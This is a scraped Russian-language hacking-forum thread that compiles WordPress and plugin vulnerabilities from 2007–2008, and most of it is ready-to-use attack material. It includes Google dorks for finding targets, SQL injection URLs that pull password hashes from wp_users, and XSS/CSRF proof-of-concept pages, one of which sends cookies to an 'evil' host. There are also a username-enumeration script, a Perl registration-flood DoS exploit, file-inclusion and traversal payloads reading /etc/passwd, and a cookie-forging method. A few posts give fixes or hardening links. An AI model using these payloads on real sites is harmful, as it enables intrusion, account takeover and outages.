Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей WordPress ] (https://forum.antichat.xyz/showthread.php?t=50572)

ettee 05.10.2007 19:34
[ Обзор уязвимостей WordPress ]
 
Vulnerabilities:

Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability


1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

WordPress <= 1.5.1.1 SQL Injection Exploit

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

2.*
Wordpress <= 2.x dictionnary & Bruteforce attack

WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit


dork:
Код:
"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp ext:php
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype:php
intext:"powered by WordPress" filetype:php -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
ext:php inurl:"wp-login.php" -cvs

Full path disclosure:

WordPress < 1.5.2

Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

Tables/Prefix_/Columns:
wp_

Hash algorithms:
md5(password)

WordPress Vulnerability Scanner
Код:
$ perl -x wp-scanner.pl http://testblog/wordpress/

WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)

Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration[*] Finding WordPress Major Version[*] Testing WordPress Template for XSS

WordPress Basic Results

        wp-commentsrss2.php =>  Version Leak: WordPress 2.1.3
        wp-links-opml.php =>    Version Leak: WordPress 2.1.3
        wp-major-ver => Version 2.1
        wp-rdf.php =>  Version Leak: WordPress 2.1.3
        wp-rss.php =>  Version Leak: WordPress 2.1.3
        wp-rss2.php =>  Version Leak: WordPress 2.1.3
        wp-server =>    Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
        wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
        wp-title => Test Blog
        wp-version =>  WordPress 2.1.3
        x-Pingback =>  http://testblog/wordpress/xmlrpc.php

WordPress Plugins Found

        wp-plugins[0]    => Akismet
Download

+toxa+ 05.10.2007 19:39
WordPress Scanner v1.3b BETA
 
http://blogsecurity.net/cgi-bin/wp-scanner.cgi
http://blogsecurity.net/projects/wp-scanner.zip

+toxa+ 05.10.2007 19:48
WordPress <=2.0.4 XSS
 
simple PoC:
Код HTML:
<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
cookie theft PoC:

Код HTML:
<html>
<head></head>
<body>

<form method="post"
action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
>
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="anyusername" />
<input type="hidden" name="user_email" id="user_email"
value='"><script>eval(location.hash.substr(1))</script>' />

</form>
<script>document.forms[0].submit()</script>
</body>
</html>
unrestricted script insertion from third-party site

(we prove we can
inject ANY JS):

Код HTML:
<html>
<head></head>
<body>

<form method="post" action="http://victim/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="test" />
<input type="hidden" name="user_email" id="user_email"
value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

Solide Snake 05.10.2007 19:51
07 июня, 2007
Программа: WordPress 2.2, возможно более ранние версии

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST
Вот пример запроса
Код HTML:
<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>Здесь логин</value></param>
<param><value>Сдесь пароль</value></param>
<param><value>1</value></param>
<param><value>0 UNION SELECT USER()</value></param>
</params>
</methodCall>

+toxa+ 05.10.2007 19:54
Wordpress 2.2 Username Enumeration
 
PHP код:
#!/bin/bash

# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]
then
       echo "need to parameters! correct syntax is:"
       echo "$0 <ip-or-hostname> <wordlist-filename>"
       exit 1
fi


for U in `cat $2`
do
       #echo $U

       if curl --d
"log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url
"http://$1/wordpress/wp-login.php" grep -'Incorrect password' >
/dev/null
       then
               echo "username found!: $U# print username found on screen
               echo $U >> $0.found # save results to file equals to
script name plus .found extension
       fi
done 

+toxa+ 05.10.2007 20:20
WordPress Security Whitepaper
 
Цитата:
* Table of Contents
* Introduction
* Installing WordPress
o Accessing your WordPress tables
o Changing your WordPress Table Prefix
o Before Installation
o Manually Change
o Through WP Prefix Table Changer
* Preparing the Blog
o Changing your Admin Username
o Create a new limited access user
* Hardening your WP Install
o Restricting wp-content & wp-includes
o Restricting wp-admin
o Block all except your IP
o Password Required - .htpasswd
o The .htaccess file
o The .htpasswd file
* MUSTHAVE Plugins
o WPIDS - Detect Intrusions
o WordPress Plugin Tracker – Are you updated?
o WordPress Online Security Scanner
http://blogsecurity.net/projects/secure-wp-whitepaper.pdf

&&

Writing Secure WordPress Plugins
http://michaeldaw.org/papers/securing_wp_plugins/

ettee 05.10.2007 20:26
WordPress PHP_Self Cross-Site Scripting Vulnerability
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">       
<head>
        <title>Wordpress XSS PoC</title>
</head>
<body id="main">

        <form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
                <p>
                        <textarea name="newcontent" rows="8" cols="40">&lt;?php echo "Owned! " . date('F d, Y'); ?&gt;</textarea>
                </p>
                <p>
                        <input type="hidden" name="action" value="update" />
                        <input type="hidden" name="file" value="wp-content/themes/default/index.php" />               
                </p>
        </form>       
        <script type="text/javascript">
        // <![CDATA[
                document.forms[0].submit();
        // ]]>
        </script>
</body>
</html>
Vulnerable URI:
Код:
/wp-admin/plugins.php?page=akismet-key-config
Vulnerable Post variable:
Код:
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
by 0x000000

Fugitif 05.10.2007 20:28
Wordpress Plugin Scanner
 
http://img294.imageshack.us/img294/4733/pspo8.jpg


http://www.blogeek.net/2007/09/26/wo...lugin-scanner/

Solide Snake 06.10.2007 08:53
Перебор паролей для версии Wordpress 2.x на Python тут.

ettee 06.10.2007 16:38
runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0


WP <2.3
http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>


WordPress 2.0.1 Remote DoS Exploit
Код:
#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST  ".$dir."wp-register.php HTTP/1.1\r\n".
              "Accept: */*\r\n".
              "Accept-Language: en-gb\r\n".
              "Content-Type: application/x-www-form-urlencoded\r\n".
              "Accept-Encoding: gzip, deflate\r\n".
              "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
              "Host: $host\r\n".
              "Content-Length: $len\r\n".
              "Connection: Keep-Alive\r\n".
              "Cache-Control: no-cache\r\n\r\n".
 "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$foo", 0);
    syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /wordpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};

The_HuliGun 21.10.2007 16:45
Раскрытие Пути
Код:
http://[target]/[path]/wp-content/plugins/akismet/akismet.php

Solide Snake 28.10.2007 03:32
Simple Forum (for WordPress) sql-inject exploit (public version)

Fugitif 01.11.2007 19:21
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability

Код:
#Author: S.W.A.T.


#cont@ct: svvateam@yahoo.com

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  BackUpWordPress 0.4.2b

Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

--------------------------------------------------------------------------------
Vuln :

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

& other Files & Folders In The [Archive] Folder

--------------------------------------------------------------------------------

Dork:

"inurl:/plugins/BackUp"

Mirror:

http://www.milw0rm.com/exploits/4593

Fugitif 05.12.2007 21:23
Sql Injection in wordpress 2.3.1
 
Sql Injection in wordpress 2.3.1


Код:
Author : Beenu Arora

Mail : beenudel1986 (at) gmail (dot) com [email concealed]

Application : WordPress (2.3.1)

Homepage: http://wordpress.org/

~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

Parameter : P

POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/*

Код:
http://www.securityfocus.com/archive/1/484608

Solide Snake 11.12.2007 20:29
Wordpress toolkit exploit

Fugitif 11.12.2007 21:47
WordPress Charset SQL Injection Vulnerability
 
WordPress Charset SQL Injection Vulnerability

Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection.
( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html )


Exploit:
http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23

_http://ilia.ws/archives/103-mysql_real_escape_string-
versus-Prepared-Statements.html

Код:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== WordPress Charset SQL Injection Vulnerability ===

Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc);
}


  Finally, escape() method belongs to wp-includes/wp-db.php:

function escape($string) {
  return addslashes( $string ); // Disable rest for now, causing problems
  ......
}


3. Proof of concept

  a. After WordPress installation, modify wp-config.php to make sure
    it uses certain character set for database connection (Big5 can
also be used):
    define('DB_CHARSET', 'GBK');

  b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23


4. Workaround

  Note: This vulnerability only exists for database queries performed
  using certain character sets. For databases created in most other
  character sets no remedy is needed.

  a. It is recommended to convert WordPress database to use character sets not
    vulnerable to such SQL exploit. One such charset is UTF-8, which does not
    use backslash ('\') as part of character and it supports various languages.
  b. Alternatively, edit WordPress theme to remove search capability.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org

iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----

Fugitif 16.12.2007 01:49
Wordpress 2.3.1 - Broken Access Control is_admin()
 
Получение админских привелегий в обход пароля.

Как юзать: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63

Код:
By Michael Brooks

Vulnerability:Broken Access Control

Homepage:http://wordpress.org/download

Software: Wordpress

Version affected:2.3.1 (Latest at the time of writing)



The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.



This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted.



exploit:

htttp://localhost/wordpress/'wp-admin/


This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
htttp://localhost/wordpress/'wp-admin/


Vulnerable function:

line 34, in ./wp-includes/query.php.

function is_admin () {

global $wp_query;



return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));

}

The same flaw is duplicted in again on line 645 of the same file.



This url: htttp://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true. This flaw works regardless of register_globas or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.

+toxa+ 25.12.2007 21:45
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
 
Код:
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# milw0rm.com [2007-12-05]

+toxa+ 25.12.2007 21:52
XSS in WP-ContactForm <= 2.0.7
 
For attacking admin only (at options page):

1
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
2
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
3
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
4
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
=====
For attacking every user of the site (at contact page):

5
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</form>
</body>
</html>
======
For attacking every user of the site at contact page (and admin at options page):

6
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
7
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
======
For attacking every user of the site (at contact page):

8
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="test@test.test" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</form>
</body>
</html>
9
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</form>
</body>
</html>

+toxa+ 03.01.2008 16:43
directory traversal vulnerabilities in WP 2.0.11(win only)
 
PHP код:
function validate_file(..)
if (false !== strpos($file./)) 
Код:
Proof of concept:
http://site/wp-admin/index.php?page=\..\..\.htaccess

Solide Snake 07.01.2008 11:35
Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
 
Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability

Файловый менеджер находится тут:

Код:
http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
После загрузки скрипт вы найдете в этом каталоге:

Код:
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)
Запрос для поиска:

Код:
plugins/wp-filemanager/
inurl:/wp-filemanager/

ettee 08.01.2008 00:29
Код:
/wp-admin/index.php?page=\..\..\file.php
/wp-admin/index.php?page=\..\..\.htaccess
/wp-admin/link-manager.php?page=\..\..\.htaccess
/wp-admin/link-add.php?page=\..\..\.htaccess
/wp-admin/link-categories.php?page=\..\..\.htaccess
/wp-admin/link-import.php?page=\..\..\.htaccess
/wp-admin/theme-editor.php?page=\..\..\.htaccess
/wp-admin/plugin-editor.php?page=\..\..\.htaccess
/wp-admin/profile.php?page=\..\..\.htaccess
/wp-admin/users.php?page=\..\..\.htaccess
/wp-admin/options-general.php?page=\..\..\.htaccess
/wp-admin/options-writing.php?page=\..\..\.htaccess
/wp-admin/options-reading.php?page=\..\..\.htaccess
/wp-admin/options-discussion.php?page=\..\..\.htaccess
/wp-admin/options-permalink.php?page=\..\..\.htaccess
/wp-admin/options-misc.php?page=\..\..\.htaccess
/wp-admin/import.php?page=\..\..\.htaccess
/wp-admin/admin.php?page=\..\..\.htaccess
/wp-admin/bookmarklet.php?page=\..\..\.htaccess
/wp-admin/cat-js.php?page=\..\..\.htaccess
/wp-admin/inline-uploading.php?page=\..\..\.htaccess
/wp-admin/options.php?page=\..\..\.htaccess
/wp-admin/profile-update.php?page=\..\..\.htaccess
/wp-admin/sidebar.php?page=\..\..\.htaccess
/wp-admin/user-edit.php?page=\..\..\.htaccess
win only

halkfild 14.01.2008 02:24
WordPress <=2.3.1 Cookies Manipulation - Вход по md5() хешу пароля в куках
 
Вход по md5() хешу пароля в куках

Программа: WordPress 2.3.1 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности.

Уязвимость существует из-за того, что злоумышленник может создать два аутентификационных файла куки ("wordpressuser_*" и "wordpresspass_*") из данных в таблице "users" и получить административный доступ к приложения. Для успешной эксплуатации уязвимости злоумышленнику требуется получить доступ на чтение таблицы "users" в базе данных.

описание и сайт
http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt

==================================

PHP код:
$siteurl;$host;
'wordpressuser_'.md5($siteurl).'='.$login
'wordpresspass_'.md5($siteurl).'='.md5(md5($pass)) 
Здесь $siteurl - переменная которая лежит в БД:
wp_options
-siteurl
Тоесть при SQL-инъекции желательно вытащить и ее тоже: (select siteurl from wp_options)

Иногда один вордпресс используется для разных доменных имен.
Тогда вместо $siteurl берется $host, фактически равное URL-пути до блога, например:
http://wordpress.com/blog
без слеша на конце.



NEW! Дополнение.

Раскрытие COOKIEHASH.

Необязательно вообще добывать siteurl, кодировать его в мд5 и проверять.

Достаточно послать пост-пакет на wp-pass.php или на wp-login.php
В ответе вам вернется валидный COOKIEHASH кукиса.

[-1-] /wp-login.php?action=logout

[-2-] wp-pass.php

Код:
POST /wordpress/wp-pass.php HTTP/1.0
Host: localhost
Content-Length: 20

post_password=test

ettee 16.01.2008 01:04
Files locations
Код:
blogscout
lectblog
blogs
blog
blog-*
blog*
myblog
bloggt
blo
*-blog
wp
wordpress
wordpress.1
wordpress-1
wordpress_1
wordpress-*
wordpress_*
weblog
webblog
webblogs
web-blog
my-journals
myjournal
my-favorite-blog
myblog
myblogs
my-blogs
wp1-5
wp2.2
wp2-2
wp2.3
wp2-3
wp2.2
wp2.0
powered-by-wordpress
wordpress-mu
wordpress_1_5
wordpress-1.5
wordpress-1-5-1
wordpress-1.5.2       
wordpress-1.0.2
wordpress-1-2-2
wordpress_2.0_only
wordpress_2.3-series
wordpress_2.3.2
wordpress_2-3-1
Wordpress_2.4
Wordpress_2.5
Wordpress_2-5
wordpress_2.3.1
wordpress_2.0.2
wordpress_2.3
wordpress_2.0.7
Wordpress_2.4
wordpress_2.2.3
wordpress_2.1.2
WordPress_2.4
wordpress_2.3.1
WordPress_2-3
WordPress_2-2-2       
WordPress_2-3-3
wordpress_2-3
Wordpress_2-2

+toxa+ 17.01.2008 17:23
Democracy 2.0.1 HTML Injection Vulnerability
 
Код:
http://wordpress.dom/blah’style=xss:expression(alert(document.cookie)); (Tested on IE7)
OR
http://wordpress.dom/blah’onMouseOver=javascript:alert(document.cookie);// (Testing on Firebox & IE)
fix
PHP код:
Vulnerable codein class.php (Line 166)
$url htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’‘dem_poll_id’ => $this->id)));

Change to:
$url htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’‘dem_poll_id’ => $this->id)), ENT_QUOTES); 

+toxa+ 17.01.2008 17:24
WP TextLinkAds Plugin SQL Injection Vulnerability
 
Код:
http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id=’/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23
fix
PHP код:
The vulnerable code is found on line 512:
$postId $postId;
This variable is passed to $wpdb->get_results without being sanitised.
to fix this holesimply change the above line to:
$postId = (int) $postId

iddqd 19.01.2008 03:20
WordPress<=2.0.3 Arbitrary file deletion

Только на Windows:

Код HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\.htaccess
Это также может быть использовано для проведения DoS-атаки. При удалении index.php сайт перестанет нормально функционировать.

WordPress<=2.0.3 DoS:

Код HTML:
